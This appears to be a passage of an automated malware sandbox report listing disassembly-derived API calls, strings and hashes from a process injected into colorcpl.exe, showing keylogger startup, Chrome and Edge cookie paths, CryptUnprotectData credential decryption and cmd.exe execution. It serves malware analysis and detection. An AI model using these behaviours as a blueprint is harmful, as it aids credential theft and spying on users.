                                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0671B082
                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0671B09B
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Value___vcrt_
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1426506684-0
                                                                                                                              • Opcode ID: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                                                                                                              • Instruction ID: a2e6a5c1d0810d24097753e4042e950d97739f09a0c57a48fc1a7d0896f065ae
                                                                                                                              • Opcode Fuzzy Hash: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                                                                                                              • Instruction Fuzzy Hash: 3001F73262C355EEA7F427BC7E99A7A2A49EB01EB5720033BF3385E4F0EF1148819154
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • GetLastError.KERNEL32(0000000A,0000000B,0000000A,046A05E2,046A1CCB,00000000,?,?,?,?,046A1EAE,00000000,0000000A,000000FF,0000000A,00000000), ref: 046A829E
                                                                                                                              • _free.LIBCMT ref: 046A82D3
                                                                                                                              • _free.LIBCMT ref: 046A82FA
                                                                                                                              • SetLastError.KERNEL32(00000000,0000000A,00000000), ref: 046A8307
                                                                                                                              • SetLastError.KERNEL32(00000000,0000000A,00000000), ref: 046A8310
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLast$_free
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3170660625-0
                                                                                                                              • Opcode ID: 143fd6256ec32bc6b3b13591ea38ad23eb6f1f8186aba34d6b1ffc2615af98c7
                                                                                                                              • Instruction ID: 1a55e3e3f3fdc58ea2845fed87e6220b5bd732d3899de79face4823a3e57bf6e
                                                                                                                              • Opcode Fuzzy Hash: 143fd6256ec32bc6b3b13591ea38ad23eb6f1f8186aba34d6b1ffc2615af98c7
                                                                                                                              • Instruction Fuzzy Hash: E5014936604F0027E31176756C88A6B2529DFD2279720102CFC1593380FF74EC654DE4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • _free.LIBCMT ref: 046B09D4
                                                                                                                                • Part of subcall function 046A6782: RtlFreeHeap.NTDLL(00000000,00000000,?,046B0C6F,0000000A,00000000,0000000A,00000000,?,046B0F13,0000000A,00000007,0000000A,?,046B145E,0000000A), ref: 046A6798
                                                                                                                                • Part of subcall function 046A6782: GetLastError.KERNEL32(0000000A,?,046B0C6F,0000000A,00000000,0000000A,00000000,?,046B0F13,0000000A,00000007,0000000A,?,046B145E,0000000A,0000000A), ref: 046A67AA
                                                                                                                              • _free.LIBCMT ref: 046B09E6
                                                                                                                              • _free.LIBCMT ref: 046B09F8
                                                                                                                              • _free.LIBCMT ref: 046B0A0A
                                                                                                                              • _free.LIBCMT ref: 046B0A1C
                                                                                                                              Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 0980b8a8c4d5b74c25e6aed833d99bc80325ea17975a4e5a5342995d4216327d
• Instruction ID: f75a1c927d91e391933c2849df85d099deb28184cc736a473bdca55f94711d52
• Opcode Fuzzy Hash: 0980b8a8c4d5b74c25e6aed833d99bc80325ea17975a4e5a5342995d4216327d
• Instruction Fuzzy Hash: 3FF0AF32911600B79320EA58F8C1D9B37DDEA253153589909F0A8D3602FA34FCC08BD4
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
Yara matches
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
• Instruction ID: d4a82ebc6d8f6a8f04241fb790f84646087bde7bbf14ca96657fa65f0669a3c6
• Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
• Instruction Fuzzy Hash: 71F03632904235A787E4EB58FEC5C2677DDEA08751BE88919F258DB911CB30F8C0C669
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
Yara matches
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
• Instruction ID: 71c845cd7ecb697d89eb8a1bacdce54c830b13b5a2a53d2be8274607f1b8ad6e
• Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
• Instruction Fuzzy Hash: E9F0DAB18019399FC7B5AF2CBF444553B62B7046607254226F62C66A74C77545C2CFCA
Uniqueness
Uniqueness Score: -1.00%

APIs
• RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 04673ABC
• RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 04673AEB
• RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 04673B8B
Strings
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: Enum$InfoQueryValue
• String ID: [regsplt]
• API String ID: 3554306468-4262303796
• Opcode ID: c985fee9f232a6ec079f77fd64d3668d8bafa4fb8c1292ec5f7f3d68d28bdf20
• Instruction ID: b2e447c6e547cf0dc5932b33d57b0f63a83843a5d50c7ed9371ebaa8c43f8436
• Opcode Fuzzy Hash: c985fee9f232a6ec079f77fd64d3668d8bafa4fb8c1292ec5f7f3d68d28bdf20
• Instruction Fuzzy Hash: 4E512C72900219AAEB10EBA4DC95EEFB7BDEF15308F500069E506E2150FF707A48CBA5
Uniqueness
Uniqueness Score: -1.00%

APIs
• _strpbrk.LIBCMT ref: 046AE738
• _free.LIBCMT ref: 046AE855
  • Part of subcall function 0469BD19: IsProcessorFeaturePresent.KERNEL32(00000017,0469BCEB,00000000,0000000A,0000000A,00000000,0467BBB2,00000022,?,?,0469BCF8,00000000,00000000,00000000,00000000,00000000), ref: 0469BD1B
  • Part of subcall function 0469BD19: GetCurrentProcess.KERNEL32(C0000417,0000000A,00000000), ref: 0469BD3D
  • Part of subcall function 0469BD19: TerminateProcess.KERNEL32(00000000), ref: 0469BD44
Strings
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
• String ID: *?$.
• API String ID: 2812119850-3972193922
• Opcode ID: f0ff77802291893847901539d3f82721080a50fc97b19214d628675dbc1211fa
• Instruction ID: 6957d74dcfdfc574d21f4dc59e50886b0eb2c3938adabcc989f9d9d46e1cc871
• Opcode Fuzzy Hash: f0ff77802291893847901539d3f82721080a50fc97b19214d628675dbc1211fa
• Instruction Fuzzy Hash: 03517E75E40609AFDF14DFA8C880AADBBB5EF58314F24816ED854E7340E672AE11CF54
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
Yara matches
Similarity
• API ID: _free_strpbrk
• String ID: *?$.
• API String ID: 3300345361-3972193922
• Opcode ID: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
• Instruction ID: 5fa487a3dae3a6706e7cbfa6d74b864a03c30c8cf0eb3df140a7f669d54e4e0a
• Opcode Fuzzy Hash: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
• Instruction Fuzzy Hash: 1251C171E4022AAFDF54DFA8CC80ABDBBF5FF48314F24816AD954E7340E6799A418B50
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0466C4C3: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0466C4F6
• PathFileExistsW.SHLWAPI(00000000), ref: 0466C61D
• PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0466C688
Strings
• User Data\Default\Network\Cookies, xrefs: 0466C603
• User Data\Profile ?\Network\Cookies, xrefs: 0466C635
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: ExistsFilePath
• String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
• API String ID: 1174141254-1980882731
• Opcode ID: d32248a3927bbc6cd77e69a0429793df849750bba969909f2dafb00562b47f8a
• Instruction ID: cde74c79eeae9ef3bdc6f779418c5d7a2928efd1ba1e1352f4ff8d9ffc07bcd7
• Opcode Fuzzy Hash: d32248a3927bbc6cd77e69a0429793df849750bba969909f2dafb00562b47f8a
• Instruction Fuzzy Hash: 5A2100719001199ADB04FBA5DC69CFEBB7CEE51619F40012DE547A3194FF30BA4ACAD8
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0466C526: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0466C559
• PathFileExistsW.SHLWAPI(00000000), ref: 0466C6EC
• PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0466C757
Strings
• User Data\Default\Network\Cookies, xrefs: 0466C6D2
• User Data\Profile ?\Network\Cookies, xrefs: 0466C704
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: ExistsFilePath
• String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
• API String ID: 1174141254-1980882731
• Opcode ID: d2120446c45b7ca262d0ba1f1df85ac9d04244085d08344ec9ee81be1e29c0c6
• Instruction ID: 6995a14f91eed5204d62102ea4859c6710b2c29c2716d28df4966384060d35ee
• Opcode Fuzzy Hash: d2120446c45b7ca262d0ba1f1df85ac9d04244085d08344ec9ee81be1e29c0c6
• Instruction Fuzzy Hash: 8721FEB19001199ADB04FBA5DC65CFEBB79EE51619B40012DE543A3190FF30BA4ACAD8
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0466B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0466B172
  • Part of subcall function 0466B164: wsprintfW.USER32 ref: 0466B1F3
  • Part of subcall function 0467B4EF: GetLocalTime.KERNEL32(00000000), ref: 0467B509
• CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0466AF6E
• CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0466AF7A
• CreateThread.KERNEL32(00000000,00000000,0466A295,?,00000000,00000000), ref: 0466AF86
Strings
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: CreateThread$LocalTime$wsprintf
• String ID: Online Keylogger Started
• API String ID: 112202259-1258561607
• Opcode ID: 7912674d8b746e2a1ebd4b7079b984a177d3cf578737b725c9e8e72fc1c54701
• Instruction ID: e6e2368f1abe0da66111bbbcb38a7cca575f254f4ffabf55ca0dd348f750591d
• Opcode Fuzzy Hash: 7912674d8b746e2a1ebd4b7079b984a177d3cf578737b725c9e8e72fc1c54701
• Instruction Fuzzy Hash: 66010490B002183AF72076769C8ACBF7E6CCB82498B40005CF54722145F9613C498AF6
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 04666A82
• GetProcAddress.KERNEL32(00000000), ref: 04666A89
Strings
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: AddressLibraryLoadProc
• String ID: CryptUnprotectData$crypt32
• API String ID: 2574300362-2380590389
• Opcode ID: 05cc3566a618b830d14bd4fc64a96b091dd9332c3cfd3966c6c29783d0513b9c
• Instruction ID: 083a71c3fe30872e1b9ce987d3d356f7b616d476ac732d29bd1efd59589e69cc
• Opcode Fuzzy Hash: 05cc3566a618b830d14bd4fc64a96b091dd9332c3cfd3966c6c29783d0513b9c
• Instruction Fuzzy Hash: 6E018875A04216ABCB18CFADD9549BEBBB8EF55200F04416DE956D3300F675A914CB90
Uniqueness
Uniqueness Score: -1.00%

APIs
• WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,04665159), ref: 04665173
• CloseHandle.KERNEL32(?), ref: 046651CA
• SetEvent.KERNEL32(?), ref: 046651D9
Strings
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: CloseEventHandleObjectSingleWait
• String ID: Connection Timeout
• API String ID: 2055531096-499159329
• Opcode ID: c285403cea261ddc304327bbfdce2ff4480fb75b9dcebe79f2b69d1b8d0bc3a9
                                                                                                                              • Instruction ID: df4e3c5919a51f9f863bfb98e018d4b58b35627d03137d0e070e0301ed1d5c84
                                                                                                                              • Opcode Fuzzy Hash: c285403cea261ddc304327bbfdce2ff4480fb75b9dcebe79f2b69d1b8d0bc3a9
                                                                                                                              • Instruction Fuzzy Hash: 2B01F731A51B40BFE725BB35DC9642BFBD0FF15609304092DD28382B60FA64B441CF51
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0466E833
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Exception@8Throw
                                                                                                                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                              • API String ID: 2005118841-1866435925
                                                                                                                              • Opcode ID: bbe4213068a7eed2501fc0edd39904aff61b52416f1c2fcf19f564139b796486
                                                                                                                              • Instruction ID: 5f8fa2685e24cc1fb255bffcd24bf8db4b74c8d8c4a6889077bfa3851ed7851e
                                                                                                                              • Opcode Fuzzy Hash: bbe4213068a7eed2501fc0edd39904aff61b52416f1c2fcf19f564139b796486
                                                                                                                              • Instruction Fuzzy Hash: 6F01D6B46403496FFB14EA94C846FB97B689B30705F00401CA90B95181FA677A02CAA7
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              • C:\Windows\SysWOW64\colorcpl.exe, xrefs: 046676C4
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: C:\Windows\SysWOW64\colorcpl.exe
                                                                                                                              • API String ID: 0-1707929182
                                                                                                                              • Opcode ID: e8d8bb2dce113654ae744c7a48a5d2a5f324db612597b37457f4b87805c68023
                                                                                                                              • Instruction ID: 79dbc9b18bd612a7d6f87f719b86af884abb7b67be707bfb726622d178d7bad4
                                                                                                                              • Opcode Fuzzy Hash: e8d8bb2dce113654ae744c7a48a5d2a5f324db612597b37457f4b87805c68023
                                                                                                                              • Instruction Fuzzy Hash: 82F0B470F11200ABFF147F6499286A83A55EB9674FF400469E503DA2C4FBA8AC45C6A4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0466DFB1
                                                                                                                              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0466DFF0
                                                                                                                                • Part of subcall function 04695640: _Yarn.LIBCPMT ref: 0469565F
                                                                                                                                • Part of subcall function 04695640: _Yarn.LIBCPMT ref: 04695683
                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0466E016
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                                                              • String ID: bad locale name
                                                                                                                              • API String ID: 3628047217-1405518554
                                                                                                                              • Opcode ID: a80f5a41d2e2cb74f970e5c3ef9329f59065e5e6b301837853b8666794388fba
                                                                                                                              • Instruction ID: 7025a66966e2baa4a294e55ad82efe66c70a24e06cc51437f895a6be340b8b8f
                                                                                                                              • Opcode Fuzzy Hash: a80f5a41d2e2cb74f970e5c3ef9329f59065e5e6b301837853b8666794388fba
                                                                                                                              • Instruction Fuzzy Hash: AFF04F32500604AAE728FF60E8659AAB7ACAF10718F50496DA91712490FF75BA19CA9C
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • RegCreateKeyW.ADVAPI32(80000001,00000000,046D52D8), ref: 0467381F
                                                                                                                              • RegSetValueExW.ADVAPI32(046D52D8,?,00000000,00000001,00000000,00000000,046D52F0,?,0466F823,pth_unenc,046D52D8), ref: 0467384D
                                                                                                                              • RegCloseKey.ADVAPI32(046D52D8,?,0466F823,pth_unenc,046D52D8), ref: 04673858
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseCreateValue
                                                                                                                              • String ID: pth_unenc
                                                                                                                              • API String ID: 1818849710-4028850238
                                                                                                                              • Opcode ID: 11dedd6af4d0c3548a20829bd3b0739fd62e92d3cfae97dbb5efc977ce0d2b50
                                                                                                                              • Instruction ID: 33cf15112d018a7b64fe4fa6b0cf36a40e1a487a279c4b1524fed185ffe51254
                                                                                                                              • Opcode Fuzzy Hash: 11dedd6af4d0c3548a20829bd3b0739fd62e92d3cfae97dbb5efc977ce0d2b50
                                                                                                                              • Instruction Fuzzy Hash: 3DF0A971540118FBEF10AFA1EC05AEA376CEF01751F104118FD0696240FB39AE48DA90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _free
                                                                                                                              • String ID: (]?$8_?
                                                                                                                              • API String ID: 269201875-2083683356
                                                                                                                              • Opcode ID: 4c93d15631b6bd86271dfff028913aa9a4ae723767ba7bfe605802b2b693a9a6
                                                                                                                              • Instruction ID: 3a33bfbb23bdb7d59a0a7de220c912e9ae1883a8dc6f251fa731e823d537020a
                                                                                                                              • Opcode Fuzzy Hash: 4c93d15631b6bd86271dfff028913aa9a4ae723767ba7bfe605802b2b693a9a6
                                                                                                                              • Instruction Fuzzy Hash: C8E06C21602E2051F775A57DAC14B9A0985DB91239F110359FC34C63D0FE64ACD15996
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 04676130
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ExecuteShell
                                                                                                                              • String ID: /C $cmd.exe$open
                                                                                                                              • API String ID: 587946157-3896048727
                                                                                                                              • Opcode ID: 5d15885e0d831eeeb36883157c60ef28b8d35a17d3e3c9cbc1b3cfca9c92b822
                                                                                                                              • Instruction ID: fd5aaa9b7c66a99911fe8293c398a75e87c7da9146527109ac7c906998494cf8
                                                                                                                              • Opcode Fuzzy Hash: 5d15885e0d831eeeb36883157c60ef28b8d35a17d3e3c9cbc1b3cfca9c92b822
                                                                                                                              • Instruction Fuzzy Hash: 08E0C0702483446BE704EB64C8A4CBB73EDEA51609B40081CB14792050FF74BD09CA59
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • TerminateThread.KERNEL32(0466A27D,00000000,046D52F0,pth_unenc,0466D0B8,046D52D8,046D52F0,?,pth_unenc), ref: 0466B8BB
                                                                                                                              • UnhookWindowsHookEx.USER32(046D50F0), ref: 0466B8C7
                                                                                                                              • TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0466B8D5
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: TerminateThread$HookUnhookWindows
                                                                                                                              • String ID: pth_unenc
                                                                                                                              • API String ID: 3123878439-4028850238
                                                                                                                              • Opcode ID: 23a3839ba1ab63f28e79ff36bce27da7964443f253a52ad72866aeb4c7473e1f
                                                                                                                              • Instruction ID: 6b252eb9a7c678247f4b0dff2acf13a59caf346e6ffb6db8a75347ef78b23adc
                                                                                                                              • Opcode Fuzzy Hash: 23a3839ba1ab63f28e79ff36bce27da7964443f253a52ad72866aeb4c7473e1f
                                                                                                                              • Instruction Fuzzy Hash: AFE0C2B1344322EFDB240FD0A8888257AEEDA05785304143DF3C392620E6752C44CB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 04661414
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0466141B
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                                              • String ID: GetCursorInfo$User32.dll
                                                                                                                              • API String ID: 1646373207-2714051624
                                                                                                                              • Opcode ID: c863648181e902518b3ddc6e26fdb36aeeee75f5ac5f3a44e7e5a9dc3415ec75
                                                                                                                              • Instruction ID: 670dfbd01c99157ef2e1f63e290528408b377f69baf163c7c7ca1eb277d41378
                                                                                                                              • Opcode Fuzzy Hash: c863648181e902518b3ddc6e26fdb36aeeee75f5ac5f3a44e7e5a9dc3415ec75
                                                                                                                              • Instruction Fuzzy Hash: 38B09BF0D5360097DB005BB4540E8163D64F514701304201DB50691100F77C1845CE54
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 046614B9
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 046614C0
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                              • String ID: GetLastInputInfo$User32.dll
                                                                                                                              • API String ID: 2574300362-1519888992
                                                                                                                              • Opcode ID: 08a9f680783e19578df19078d50e268ad7d0c7a58025afe333bd137f58901463
                                                                                                                              • Instruction ID: 23ed9f6301a21ee47583424a401d51dd1c11b9d239596e2f5406c496439a8cda
                                                                                                                              • Opcode Fuzzy Hash: 08a9f680783e19578df19078d50e268ad7d0c7a58025afe333bd137f58901463
                                                                                                                              • Instruction Fuzzy Hash: 03B092F0DD2200ABCB009FA4A80E82A3ABCE608702300641EBA06D1600FBB858448F91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _free
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 269201875-0
                                                                                                                              • Opcode ID: e51e2b160430e069a94018d2a40d83d225257a5f61c10d126208887eb2308fed
                                                                                                                              • Instruction ID: f5a73573b3dc757805b14b52c485f3d273d0bfc8cf251bedbd44c8dc837928bd
                                                                                                                              • Opcode Fuzzy Hash: e51e2b160430e069a94018d2a40d83d225257a5f61c10d126208887eb2308fed
                                                                                                                              • Instruction Fuzzy Hash: 3FC15971D00367AFDBE4DF79CD44ABA7BB8EF45220F1841AAE6A497250E7318A41CB50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: __alldvrm$_strrchr
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1036877536-0
                                                                                                                              • Opcode ID: 1c2f8d94d364138046bbb34e3d605a48dba68099088dad1340652e4fa8770d15
                                                                                                                              • Instruction ID: 6f039ee34748c37cbced50a138e6fee92850292b6d67cd6933399283d9972076
                                                                                                                              • Opcode Fuzzy Hash: 1c2f8d94d364138046bbb34e3d605a48dba68099088dad1340652e4fa8770d15
